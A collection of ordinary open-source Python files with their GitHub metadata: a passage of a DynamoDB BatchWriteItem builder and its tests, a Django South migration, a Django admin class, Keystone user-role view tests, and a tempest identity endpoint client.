        >>> c[0].capacity_units
        2.0
        >>> c[0].table.capacity_units
        1.0
        >>> c[0].global_secondary_indexes["gsi"].capacity_units
        1.0
        """
        return self.__return_consumed_capacity.indexes()

    @proxy
    def return_consumed_capacity_none(self):
        """
        >>> print connection(
        ...   BatchWriteItem().table(table).delete({"h": 5})
        ...     .return_consumed_capacity_none()
        ... ).consumed_capacity
        None
        """
        return self.__return_consumed_capacity.none()

    @proxy
    def return_item_collection_metrics_size(self):
        """
        >>> m = connection(
        ...   BatchWriteItem().table(table2)
        ...     .put({"h": 0, "r1": 0, "r2": 0})
        ...     .return_item_collection_metrics_size()
        ... ).item_collection_metrics
        >>> m[table2][0].item_collection_key
        {u'h': 0}
        >>> m[table2][0].size_estimate_range_gb
        [0.0, 1.0]
        """
        return self.__return_item_collection_metrics.size()

    @proxy
    def return_item_collection_metrics_none(self):
        """
        >>> print connection(
        ...   BatchWriteItem().table(table2)
        ...     .put({"h": 1, "r1": 0, "r2": 0})
        ...     .return_item_collection_metrics_none()
        ... ).item_collection_metrics
        None
        """
        return self.__return_item_collection_metrics.none()

    def __check_active_table(self):
        # Guard for put()/delete(): a table must have been selected first.
        if self.__active_table is None:
            raise _lv.BuilderError("No active table.")
class BatchWriteItemUnitTests(_tst.UnitTests):
def test_name(self):
self.assertEqual(BatchWriteItem().name, "BatchWriteItem")
def test_empty(self):
self.assertEqual(
BatchWriteItem().payload,
{}
)
def test_return_consumed_capacity_none(self):
self.assertEqual(
BatchWriteItem().return_consumed_capacity_none().payload,
{
"ReturnConsumedCapacity": "NONE",
}
)
def test_return_consumed_capacity_indexes(self):
self.assertEqual(
BatchWriteItem().return_consumed_capacity_indexes().payload,
{
"ReturnConsumedCapacity": "INDEXES",
}
)
def test_return_consumed_capacity_total(self):
self.assertEqual(
BatchWriteItem().return_consumed_capacity_total().payload,
{
"ReturnConsumedCapacity": "TOTAL",
}
)
def test_return_item_collection_metrics_none(self):
self.assertEqual(
BatchWriteItem().return_item_collection_metrics_none().payload,
{
"ReturnItemCollectionMetrics": "NONE",
}
)
def test_return_item_collection_metrics_size(self):
self.assertEqual(
BatchWriteItem().return_item_collection_metrics_size().payload,
{
"ReturnItemCollectionMetrics": "SIZE",
}
)
def test_table(self):
self.assertEqual(
BatchWriteItem().table("Table").payload,
{
"RequestItems": {
"Table": [
],
},
}
)
def test_constuctor_with_table(self):
self.assertEqual(
BatchWriteItem("Table").delete({"hash": u"h1"}).payload,
{
"RequestItems": {
"Table": [
{"DeleteRequest": {"Key": {"hash": {"S": "h1"}}}},
],
},
}
)
def test_constuctor_with_table_and_delete(self):
self.assertEqual(
BatchWriteItem("Table", delete=[{"hash": u"h1"}]).payload,
{
"RequestItems": {
"Table": [
{"DeleteRequest": {"Key": {"hash": {"S": "h1"}}}},
],
},
}
)
def test_constuctor_with_table_and_put(self):
self.assertEqual(
BatchWriteItem("Table", put=[{"hash": u"h1"}]).payload,
{
"RequestItems": {
"Table": [
{"PutRequest": {"Item": {"hash": {"S": "h1"}}}},
],
},
}
)
def test_table_with_delete(self):
self.assertEqual(
BatchWriteItem().table("Table", delete=[{"hash": u"h1"}, {"hash": u"h2"}]).payload,
{
"RequestItems": {
"Table": [
{"DeleteRequest": {"Key": {"hash": {"S": "h1"}}}},
{"DeleteRequest": {"Key": {"hash": {"S": "h2"}}}},
],
},
}
)
def test_table_with_delete_twice(self):
self.assertEqual(
BatchWriteItem().table("Table", delete=[{"hash": u"h1"}]).table("Table", delete=[{"hash": u"h2"}]).payload,
{
"RequestItems": {
"Table": [
{"DeleteRequest": {"Key": {"hash": {"S": "h1"}}}},
{"DeleteRequest": {"Key": {"hash": {"S": "h2"}}}},
],
},
}
)
def test_table_with_put(self):
self.assertEqual(
BatchWriteItem().table("Table", put=[{"hash": u"h1"}, {"hash": u"h2"}]).payload,
{
"RequestItems": {
"Table": [
{"PutRequest": {"Item": {"hash": {"S": "h1"}}}},
{"PutRequest": {"Item": {"hash": {"S": "h2"}}}},
],
},
}
)
def test_table_with_put_twice(self):
self.assertEqual(
BatchWriteItem().table("Table", put=[{"hash": u"h1"}]).table("Table", put=[{"hash": u"h2"}]).payload,
{
"RequestItems": {
"Table": [
{"PutRequest": {"Item": {"hash": {"S": "h1"}}}},
{"PutRequest": {"Item": {"hash": {"S": "h2"}}}},
],
},
}
)
def test_delete(self):
self.assertEqual(
BatchWriteItem().table("Table").delete({"hash": u"h1"}).table("Table").delete([{"hash": u"h2"}]).payload,
{
"RequestItems": {
"Table": [
{"DeleteRequest": {"Key": {"hash": {"S": "h1"}}}},
{"DeleteRequest": {"Key": {"hash": {"S": "h2"}}}},
],
},
}
)
def test_put(self):
self.assertEqual(
BatchWriteItem().table("Table").put({"hash": u"h1"}, [{"hash": u"h2"}]).payload,
{
"RequestItems": {
"Table": [
{"PutRequest": {"Item": {"hash": {"S": "h1"}}}},
{"PutRequest": {"Item": {"hash": {"S": "h2"}}}},
],
},
}
)
def test_alternate_between_tables_and_put_delete(self):
self.assertEqual(
BatchWriteItem()
.table("Table1").delete({"hash": u"h1"})
.table("Table2").put([{"hash": u"h2"}])
.table("Table1").put({"hash": u"h11"})
.table("Table2").delete({"hash": u"h22"})
.payload,
{
"RequestItems": {
"Table1": [
{"DeleteRequest": {"Key": {"hash": {"S": "h1"}}}},
{"PutRequest": {"Item": {"hash": {"S": "h11"}}}},
],
"Table2": [
{"DeleteRequest": {"Key": {"hash": {"S": "h22"}}}},
{"PutRequest": {"Item": {"hash": {"S": "h2"}}}},
],
},
}
)
def test_put_without_active_table(self):
with self.assertRaises(_lv.BuilderError) as catcher:
BatchWriteItem().put({"h": 0})
self.assertEqual(catcher.exception.args, ("No active table.",))
def test_delete_without_active_table(self):
with self.assertRaises(_lv.BuilderError) as catcher:
BatchWriteItem().delete({"h": 0})
self.assertEqual(catcher.exception.args, ("No active table.",))
class BatchWriteItemResponseUnitTests(_tst.UnitTests):
    """Unit tests for the attribute mapping of BatchWriteItemResponse."""
    def test_all_none(self):
        """A response built with no kwargs exposes None for every attribute."""
        response = BatchWriteItemResponse()
        self.assertIsNone(response.consumed_capacity)
        self.assertIsNone(response.item_collection_metrics)
        self.assertIsNone(response.unprocessed_items)
    def test_all_set(self):
        """Capacity and metrics kwargs are wrapped in their result types;
        UnprocessedItems is passed through untouched (identity preserved)."""
        sentinel = object()
        response = BatchWriteItemResponse(
            ConsumedCapacity=[{}],
            ItemCollectionMetrics={"A": [{}]},
            UnprocessedItems=sentinel,
        )
        self.assertIsInstance(response.consumed_capacity[0], ConsumedCapacity)
        self.assertIsInstance(response.item_collection_metrics["A"][0], ItemCollectionMetrics)
        self.assertIs(response.unprocessed_items, sentinel)
| {
"content_hash": "a2861811844384b6641a112f3ca4d880",
"timestamp": "",
"source": "github",
"line_count": 491,
"max_line_length": 173,
"avg_line_length": 34.77393075356415,
"alnum_prop": 0.5197961813283355,
"repo_name": "jacquev6/LowVoltage",
"id": "f8a99dce11d7c1a7414ee4176bf7ebc3ce16f3c5",
"size": "17159",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "LowVoltage/actions/batch_write_item.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "396929"
},
{
"name": "Shell",
"bytes": "553"
}
],
"symlink_target": ""
} |
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: add the ``UserProfile.can_create`` boolean flag."""
    def forwards(self, orm):
        # Adding field 'UserProfile.can_create'
        db.add_column('website_userprofile', 'can_create',
                      self.gf('django.db.models.fields.BooleanField')(default=False),
                      keep_default=False)
    def backwards(self, orm):
        # Deleting field 'UserProfile.can_create'
        db.delete_column('website_userprofile', 'can_create')
    # Frozen ORM snapshot auto-generated by South. Do not edit by hand;
    # change models.py and re-run ``schemamigration`` instead.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'website.country': {
            'Meta': {'object_name': 'Country'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '20'})
        },
        'website.credentialsmodel': {
            'Meta': {'object_name': 'CredentialsModel'},
            'credential': ('oauth2client.django_orm.CredentialsField', [], {'null': 'True'}),
            'id': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'primary_key': 'True'})
        },
        'website.field': {
            'Meta': {'object_name': 'Field'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'website.hub': {
            'Meta': {'object_name': 'Hub'},
            'is_displayed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_live': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'moderator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'moderator'", 'null': 'True', 'to': "orm['auth.User']"}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'primary_key': 'True'})
        },
        'website.hubpermissions': {
            'Meta': {'object_name': 'HubPermissions'},
            'allowed_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'allowed_user'", 'unique': 'True', 'to': "orm['auth.User']"}),
            'hub': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'hub'", 'primary_key': 'True', 'to': "orm['website.Hub']"})
        },
        'website.notetakingbuddy': {
            'Meta': {'unique_together': "(('hub', 'user'),)", 'object_name': 'NoteTakingBuddy'},
            'augmented_documents': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'behavior': ('django.db.models.fields.CharField', [], {'max_length': '22'}),
            'hub': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['website.Hub']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'live_session': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'note_taking_format': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
            'passionated_by_subject': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'score': ('django.db.models.fields.IntegerField', [], {}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        },
        'website.organization': {
            'Meta': {'object_name': 'Organization'},
            'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['website.Country']", 'null': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'members_role': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'website.training': {
            'Meta': {'object_name': 'Training'},
            'cowriters': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'cowriters'", 'symmetrical': 'False', 'to': "orm['auth.User']"}),
            'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'creator'", 'to': "orm['auth.User']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_displayed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_live': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_updated': ('django.db.models.fields.IntegerField', [], {'default': '1327217400'}),
            'participants': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'participants'", 'symmetrical': 'False', 'to': "orm['auth.User']"}),
            'resource_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_index': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '256', 'db_index': 'True'}),
            'total_views': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'total_views_open25': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'type': ('django.db.models.fields.CharField', [], {'max_length': '30'})
        },
        'website.trainingparticipation': {
            'Meta': {'object_name': 'TrainingParticipation'},
            'count': ('django.db.models.fields.IntegerField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'training': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['website.Training']"}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        },
        'website.trainingschedule': {
            'Meta': {'object_name': 'TrainingSchedule'},
            'event_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'start_time': ('django.db.models.fields.DateTimeField', [], {}),
            'training': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['website.Training']"})
        },
        'website.trainingtempshare': {
            'Meta': {'object_name': 'TrainingTempShare'},
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
            'facebook_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 9, 27, 0, 0)'}),
            'role': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
            'training': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['website.Training']"}),
            'user_invited': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_invited'", 'null': 'True', 'to': "orm['auth.User']"}),
            'user_who_invites': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_who_invites'", 'null': 'True', 'to': "orm['auth.User']"})
        },
        'website.userprofile': {
            'Meta': {'object_name': 'UserProfile'},
            'about_me': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'can_create': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'drive_folder_id': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
            'enable_notifications': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'facebook_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True', 'null': 'True', 'blank': 'True'}),
            'facebook_profile_url': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
            'isUniStar': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_email_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_organization_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_student': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
            'last_activity_ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True'}),
            'last_seen': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
            'linkedin_profile_url': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'organization': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['website.Organization']", 'null': 'True'}),
            'twitter_profile_url': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'}),
            'website_url': ('django.db.models.fields.TextField', [], {'blank': 'True'})
        }
    }
complete_apps = ['website'] | {
"content_hash": "f183c9de07bc4198875fb1c6094846ab",
"timestamp": "",
"source": "github",
"line_count": 171,
"max_line_length": 182,
"avg_line_length": 74.3625730994152,
"alnum_prop": 0.5518244731047499,
"repo_name": "UniShared/unishared",
"id": "f2d794ca48b4d4cda3f7a98b8bd9babc3f28cf71",
"size": "12740",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "UniShared_python/website/migrations/0022_auto__add_field_userprofile_can_create.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4964"
},
{
"name": "JavaScript",
"bytes": "647537"
},
{
"name": "Python",
"bytes": "440660"
}
],
"symlink_target": ""
} |
import reversion
from django.contrib import admin
from base.admin import (MediaRemovalAdminMixin, DownloadMediaFilesMixin,
RestrictedCompetitionAdminMixin)
from .models import Leaflet
class LeafletAdmin(RestrictedCompetitionAdminMixin,
                   MediaRemovalAdminMixin,
                   DownloadMediaFilesMixin,
                   reversion.VersionAdmin):
    """Admin for Leaflet: competition-restricted access, media cleanup/download,
    and version history via django-reversion."""
    # Columns shown in the changelist.
    list_display = (
        'competition',
        'year',
        'issue',
    )
    # Sidebar filter.
    list_filter = (
        'competition',
    )
    search_fields = (
        'competition__name',
        'year',
        'issue',
    )
    # Raw-id widget for the competition FK (avoids loading every competition).
    raw_id_fields = ('competition',)
    # define the autocomplete_lookup_fields (used by django-grappelli)
    autocomplete_lookup_fields = {
        'fk': ['competition'],
    }
    fieldsets = (
        (None, {
            'fields': ('competition', 'year', 'issue', 'leaflet')
        }),
    )
    # Audit fields shown only on the edit form, collapsed by default
    # (grp-* classes are grappelli collapse styles).
    editonly_fieldsets = (
        ('Details', {
            'classes': ('grp-collapse', 'grp-closed'),
            'fields': ('added_by', 'added_at', 'modified_by', 'modified_at')
        }),
    )
# Register Leaflet with the default admin site using the customized admin class.
admin.site.register(Leaflet, LeafletAdmin)
| {
"content_hash": "30dc816752ea31cf588c3f9a549102e5",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 76,
"avg_line_length": 21.29090909090909,
"alnum_prop": 0.5550811272416738,
"repo_name": "tbabej/roots",
"id": "ede63596afa3334f8adf6006d59155d76566ee90",
"size": "1171",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "leaflets/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "912"
},
{
"name": "HTML",
"bytes": "94535"
},
{
"name": "JavaScript",
"bytes": "16550"
},
{
"name": "Python",
"bytes": "274597"
},
{
"name": "TeX",
"bytes": "2163"
}
],
"symlink_target": ""
} |
import json
from unittest import TestCase
from unittest.mock import patch
from identity.views import (
ListUserRoleView, AddUserRoleView, DeleteUserRoleView)
from identity.tests.fakes import FakeToken, FakeResource
from vault.tests.fakes import fake_request, UserFactory
class BaseAjaxTestCase(TestCase):
    """Shared fixture for the user-role AJAX view tests: builds a superuser
    POST request and keeps Keystone and view logging patched out."""
    # Subclasses set this to the class-based view under test.
    view_class = None
    def setUp(self):
        self.view = self.view_class.as_view()
        self.request = fake_request(method='POST')
        self.request.user.token = FakeToken
        self.request.user.is_superuser = True
        # Patch for the whole test; stopped in tearDown via patch.stopall().
        patch('identity.keystone.Keystone._create_keystone_connection').start()
        patch('identity.views.log').start()
    def tearDown(self):
        # Stops every patch started with .start() in setUp (and in subclasses).
        patch.stopall()
class TestListUserRole(BaseAjaxTestCase):
    """Tests for ListUserRoleView: auth requirements, JSON output, sorting,
    and error handling around Keystone calls."""
    view_class = ListUserRoleView
    def setUp(self):
        super(TestListUserRole, self).setUp()
        # Keystone's user_list is mocked for every test in this class.
        self.mock_user_list = patch(
            'identity.keystone.Keystone.user_list').start()
    def test_list_user_role_needs_authentication(self):
        """Anonymous requests are redirected (302) to login."""
        req = fake_request(method='POST', user=False)
        response = self.view(req)
        self.assertEqual(response.status_code, 302)
    def test_list_user_role_need_to_be_superuser(self):
        """Non-superusers get a message and a redirect."""
        self.request.user.is_superuser = False
        response = self.view(self.request)
        msgs = [msg for msg in self.request._messages]
        self.assertGreater(len(msgs), 0)
        self.assertEqual(response.status_code, 302)
    def test_list_user_role_response_content_is_json(self):
        # NOTE(review): response._headers is a private (pre-Django 3.2) API —
        # confirm it still exists on the Django version in use.
        response = self.view(self.request)
        self.assertEqual(response._headers.get(
            'content-type')[1], 'application/json')
    @patch('identity.views.ListUserRoleView.get_user_roles')
    def test_list_user_role_return_sorted_users(self, mock_get_user_roles):
        """Users in the JSON payload come back sorted by name."""
        user1 = FakeResource(1)
        user1.name = 'ZZZ'
        user2 = FakeResource(2)
        user2.name = 'BBBB'
        user3 = FakeResource(3)
        user3.name = 'LLLL'
        self.mock_user_list.return_value = [user1, user2, user3]
        mock_get_user_roles.return_value = []
        # QueryDict is immutable; copy, mutate, reassign.
        post = self.request.POST.copy()
        post.update({'project': 1})
        self.request.POST = post
        response = self.view(self.request)
        computed = json.loads(response.content)
        computed_names = [x.get('username') for x in computed.get('users')]
        expected = sorted([user1.name, user2.name, user3.name])
        self.assertEqual(computed_names, expected)
    def test_user_list_was_called(self):
        """The view queries Keystone's user list for the posted project."""
        post = self.request.POST.copy()
        post.update({'project': 1})
        self.request.POST = post
        self.view(self.request)
        self.mock_user_list.assert_called_with(project_id=1)
    @patch('identity.views.ListUserRoleView.get_user_roles')
    def test_get_user_roles_was_called(self, mock_get_user_roles):
        """Each listed user has its roles fetched for the posted project."""
        user = FakeResource(1)
        user.username = 'User1'
        self.mock_user_list.return_value = [user]
        mock_get_user_roles.return_value = []
        post = self.request.POST.copy()
        post.update({'project': 1})
        self.request.POST = post
        self.view(self.request)
        mock_get_user_roles.assert_called_with(user, 1)
    @patch('identity.views.ListUserRoleView.get_user_roles')
    def test_get_user_roles_exception(self, mock_get_user_roles):
        """A failure while fetching roles surfaces as HTTP 500."""
        mock_get_user_roles.side_effect = Exception()
        mock_get_user_roles.return_value = []
        user = FakeResource(1)
        user.username = 'User1'
        self.mock_user_list.return_value = [user]
        post = self.request.POST.copy()
        post.update({'project': 1})
        self.request.POST = post
        response = self.view(self.request)
        self.assertEqual(response.status_code, 500)
class TestAddUserRole(BaseAjaxTestCase):
    """Tests for AddUserRoleView: auth, JSON content type, Keystone call
    arguments, and failure propagation."""
    view_class = AddUserRoleView
    def test_add_user_role_needs_authentication(self):
        """Anonymous requests are redirected (302)."""
        req = fake_request(method='POST', user=False)
        # NOTE(review): 'req' (not self.request) is dispatched below; clearing
        # self.request's token here looks unintentional — confirm.
        self.request.user.token = None
        response = self.view(req)
        self.assertEqual(response.status_code, 302)
    def test_add_user_role_need_to_be_superuser(self):
        """Non-superusers get a message and a redirect."""
        self.request.user.is_superuser = False
        response = self.view(self.request)
        msgs = [msg for msg in self.request._messages]
        self.assertGreater(len(msgs), 0)
        self.assertEqual(response.status_code, 302)
    @patch('identity.keystone.Keystone.add_user_role')
    def test_add_user_role_response_content_is_json(self, mock_add_user_role):
        # NOTE(review): response._headers is a private (pre-Django 3.2) API.
        response = self.view(self.request)
        self.assertEqual(response._headers.get(
            'content-type')[1], 'application/json')
    @patch('identity.keystone.Keystone.add_user_role')
    def test_add_user_role_was_called(self, mock_add_user_role):
        """POSTed project/role/user are forwarded to Keystone.add_user_role."""
        post = self.request.POST.copy()
        post.update({'project': 1, 'role': 1, 'user': 1})
        self.request.POST = post
        self.view(self.request)
        mock_add_user_role.assert_called_with(project=1, role=1, user=1)
    @patch('identity.keystone.Keystone.add_user_role')
    def test_add_user_role_exception(self, mock_add_user_role):
        """A Keystone failure surfaces as HTTP 500."""
        mock_add_user_role.side_effect = Exception()
        response = self.view(self.request)
        self.assertEqual(response.status_code, 500)
class TestDeleteUserRole(BaseAjaxTestCase):
    """Tests for DeleteUserRoleView; mirrors TestAddUserRole but for
    Keystone.remove_user_role."""
    view_class = DeleteUserRoleView
    def test_delete_user_role_needs_authentication(self):
        """Anonymous requests are redirected (302)."""
        req = fake_request(method='POST', user=False)
        # NOTE(review): 'req' (not self.request) is dispatched below; clearing
        # self.request's token here looks unintentional — confirm.
        self.request.user.token = None
        response = self.view(req)
        self.assertEqual(response.status_code, 302)
    def test_delete_user_role_need_to_be_superuser(self):
        """Non-superusers get a message and a redirect."""
        self.request.user.is_superuser = False
        response = self.view(self.request)
        msgs = [msg for msg in self.request._messages]
        self.assertGreater(len(msgs), 0)
        self.assertEqual(response.status_code, 302)
    @patch('identity.keystone.Keystone.remove_user_role')
    def test_delete_user_role_response_content_is_json(self, mock_remove_user_role):
        # NOTE(review): response._headers is a private (pre-Django 3.2) API.
        response = self.view(self.request)
        self.assertEqual(response._headers.get(
            'content-type')[1], 'application/json')
    @patch('identity.keystone.Keystone.remove_user_role')
    def test_remove_user_role_was_called(self, mock_remove_user_role):
        """POSTed project/role/user are forwarded to Keystone.remove_user_role."""
        post = self.request.POST.copy()
        post.update({'project': 1, 'role': 1, 'user': 1})
        self.request.POST = post
        self.view(self.request)
        mock_remove_user_role.assert_called_with(project=1, role=1, user=1)
    @patch('identity.keystone.Keystone.remove_user_role')
    def test_remove_user_role_exception(self, mock_remove_user_role):
        """A Keystone failure surfaces as HTTP 500."""
        mock_remove_user_role.side_effect = Exception()
        response = self.view(self.request)
        self.assertEqual(response.status_code, 500)
| {
"content_hash": "7d8ea2d15393560c555811375e58e035",
"timestamp": "",
"source": "github",
"line_count": 215,
"max_line_length": 84,
"avg_line_length": 31.86046511627907,
"alnum_prop": 0.6525547445255474,
"repo_name": "globocom/vault",
"id": "192de7fec9cb200b4ed873d31b806574eba6f860",
"size": "6874",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "identity/tests/test_ajax_views.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "32751"
},
{
"name": "Dockerfile",
"bytes": "4161"
},
{
"name": "HTML",
"bytes": "108576"
},
{
"name": "JavaScript",
"bytes": "77548"
},
{
"name": "Makefile",
"bytes": "2301"
},
{
"name": "Python",
"bytes": "363186"
},
{
"name": "Shell",
"bytes": "7361"
}
],
"symlink_target": ""
} |
import json
import urlparse
from tempest.common.rest_client import RestClient
class EndPointClientJSON(RestClient):
    """Tempest REST client for the Keystone v3 endpoints API
    (list/create/update/delete service-catalog endpoints)."""
    def __init__(self, config, username, password, auth_url, tenant_name=None):
        super(EndPointClientJSON, self).__init__(config,
                                                 username, password,
                                                 auth_url, tenant_name)
        self.service = self.config.identity.catalog_type
        # Endpoints are an admin-only API.
        self.endpoint_url = 'adminURL'
    def request(self, method, url, headers=None, body=None, wait=None):
        """Overriding the existing HTTP request in super class rest_client."""
        # NOTE(review): 'wait' is accepted but never used — confirm callers
        # rely on it before removing.
        self._set_auth()
        # Force the identity API version to v3 by rewriting base_url's path.
        # Mutates self.base_url on every call.
        self.base_url = self.base_url.replace(
            urlparse.urlparse(self.base_url).path, "/v3")
        return super(EndPointClientJSON, self).request(method, url,
                                                       headers=headers,
                                                       body=body)
    def list_endpoints(self):
        """GET /endpoints; return (response, list of endpoint dicts)."""
        resp, body = self.get('endpoints')
        body = json.loads(body)
        return resp, body['endpoints']
    def create_endpoint(self, service_id, interface, url, **kwargs):
        """POST /endpoints; optional kwargs: region, enabled.

        Omitted optionals are sent as None in the request body."""
        region = kwargs.get('region', None)
        enabled = kwargs.get('enabled', None)
        post_body = {
            'service_id': service_id,
            'interface': interface,
            'url': url,
            'region': region,
            'enabled': enabled
        }
        post_body = json.dumps({'endpoint': post_body})
        resp, body = self.post('endpoints', post_body, self.headers)
        body = json.loads(body)
        return resp, body['endpoint']
    def update_endpoint(self, endpoint_id, service_id=None, interface=None,
                        url=None, region=None, enabled=None):
        """PATCH /endpoints/{id}; only non-None parameters are sent."""
        post_body = {}
        if service_id is not None:
            post_body['service_id'] = service_id
        if interface is not None:
            post_body['interface'] = interface
        if url is not None:
            post_body['url'] = url
        if region is not None:
            post_body['region'] = region
        if enabled is not None:
            post_body['enabled'] = enabled
        post_body = json.dumps({'endpoint': post_body})
        resp, body = self.patch('endpoints/%s' % endpoint_id, post_body,
                                self.headers)
        body = json.loads(body)
        return resp, body['endpoint']
